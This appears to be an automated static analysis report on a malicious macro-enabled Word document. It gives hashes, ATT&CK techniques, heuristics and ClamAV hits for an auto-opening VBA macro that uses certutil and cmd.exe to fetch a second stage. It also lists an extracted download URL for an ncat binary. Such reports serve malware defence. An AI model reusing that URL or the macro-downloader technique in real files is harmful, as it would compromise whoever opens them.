Malicious Office (OOXML) / .DOC — malware analysis report

Static analysis result for SHA-256 429a45350a533940…

MALICIOUS

Office (OOXML) / .DOC

21.5 KB Created: 2021-06-03 14:32:00 UTC Authoring application: Microsoft Office Word 16.0000
MD5: bf595b796319d1db0d0372a4b4bb0ee6 SHA-1: 97528c6f47fbaa48d14320577d59d394e9abe20d SHA-256: 429a45350a5339406971ca89fa24781705486cf2f02e3effab42844a4593ed75
522 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1218 Signed Binary Proxy Execution

The sample contains VBA macros that execute upon opening, indicated by the AutoOpen heuristic. The script attempts to download and execute a second-stage payload, as suggested by the ClamAV detection 'Win.Downloader.CertutilURLCache-6335698-0' and the use of WScript.Shell and cmd.exe. The macro includes checks for specific filenames and virtual machine artifacts, likely to evade detection. The reconstructed filename 'certutil2_0_58_only_certutil_TEST2_cores_exact_filename_badtask_username.docm' is a key indicator.

Heuristics 12

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
  • ClamAV: Win.Downloader.CertutilURLCache-6335698-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Downloader.CertutilURLCache-6335698-0
  • ClamAV detection on extracted artifact critical EXTRACTED_FILE_CLAMAV
    ClamAV flagged at least one file extracted from inside this sample. Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator the sample is a delivery vehicle.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA project inside OOXML medium OOXML_VBA
    Document contains vbaProject.bin — VBA macros present
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://192.168.2.120/ncat1.exe
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
8b9c8cdd7197d68c643687d300e4b5d4fd16f5e22e9d2fb961b1d6de25d698a5		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3132 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s). Carved macro source contains an auto-exec entry point and execution/download terms.
vbaProject_00.bin
7c492a274b76e6ce51d74b03b9794da50bf1147c8de4fe2786fb7ea739300aed		 vba-project OOXML VBA project: word/vbaProject.bin 23552 bytes
Detection
ClamAV: Win.Downloader.CertutilURLCache-6335698-0
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s). Carved macro source contains an auto-exec entry point and execution/download terms.

Open this report in the interactive analyzer, or submit your own file for analysis.